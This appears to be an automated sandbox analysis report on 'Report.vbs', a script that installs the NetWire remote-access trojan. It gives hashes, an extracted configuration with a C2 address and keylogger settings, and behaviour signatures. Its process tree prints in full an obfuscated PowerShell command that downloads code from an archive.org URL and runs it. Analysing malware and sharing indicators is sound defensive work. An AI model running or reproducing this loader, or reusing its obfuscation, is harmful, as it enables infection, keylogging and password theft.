Analysis

  • max time kernel
    108s
  • max time network
    112s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    25-06-2021 12:41

General

  • Target

    Report.vbs

  • Size

    1KB

  • MD5

    22f664c3e1c19b865c64920ed8c9ff46

  • SHA1

    187a8eab92dad78c194303b2039feefc58c625d0

  • SHA256

    3f2520949a57c9b6342f6e6a3f13f56c124bddcd576d3a652aa237b6913e3b4f

  • SHA512

    ece857fcc1e1d487554451843761cdb65d11c6d8a5e26e53835a2abc0525082342eb9bcc1c3a1efc789258b88931c0d2d8e45ae5a29d33202fe7c21723a1136d

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://ia601406.us.archive.org/20/items/all-jjnb/ALL_jjnb.txt

Extracted

Family

netwire

C2

185.19.85.172:1723

Attributes
  • activex_autorun

    false

  • activex_key

  • copy_executable

    false

  • delete_original

    false

  • host_id

    HostId-%Rand%

  • install_path

  • keylogger_dir

    %AppData%\Logs\

  • lock_executable

    false

  • mutex

  • offline_keylogger

    true

  • password

    Password

  • registry_autorun

    false

  • startup_name

  • use_mutex

    false

Signatures

  • NetWire RAT payload 3 IoCs
  • Netwire

    Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.

  • Blocklisted process makes network request 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Report.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1864
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://ia601406.us.archive.org/20/items/all-jjnb/ALL_jjnb.txt';$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')|&('I'+'EX');
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1220
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        3⤵
          PID:288

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/288-71-0x0000000000400000-0x0000000000433000-memory.dmp
      Filesize

      204KB

    • memory/288-74-0x0000000000400000-0x0000000000433000-memory.dmp
      Filesize

      204KB

    • memory/288-73-0x0000000076A81000-0x0000000076A83000-memory.dmp
      Filesize

      8KB

    • memory/288-72-0x000000000040242D-mapping.dmp
    • memory/1220-66-0x000000001AC94000-0x000000001AC96000-memory.dmp
      Filesize

      8KB

    • memory/1220-65-0x000000001AC90000-0x000000001AC92000-memory.dmp
      Filesize

      8KB

    • memory/1220-67-0x0000000002390000-0x0000000002391000-memory.dmp
      Filesize

      4KB

    • memory/1220-68-0x000000001C390000-0x000000001C391000-memory.dmp
      Filesize

      4KB

    • memory/1220-69-0x000000001B6C0000-0x000000001B6C1000-memory.dmp
      Filesize

      4KB

    • memory/1220-70-0x00000000026E0000-0x00000000026EE000-memory.dmp
      Filesize

      56KB

    • memory/1220-64-0x00000000025F0000-0x00000000025F1000-memory.dmp
      Filesize

      4KB

    • memory/1220-63-0x000000001AD10000-0x000000001AD11000-memory.dmp
      Filesize

      4KB

    • memory/1220-62-0x0000000002430000-0x0000000002431000-memory.dmp
      Filesize

      4KB

    • memory/1220-60-0x0000000000000000-mapping.dmp
    • memory/1864-59-0x000007FEFC471000-0x000007FEFC473000-memory.dmp
      Filesize

      8KB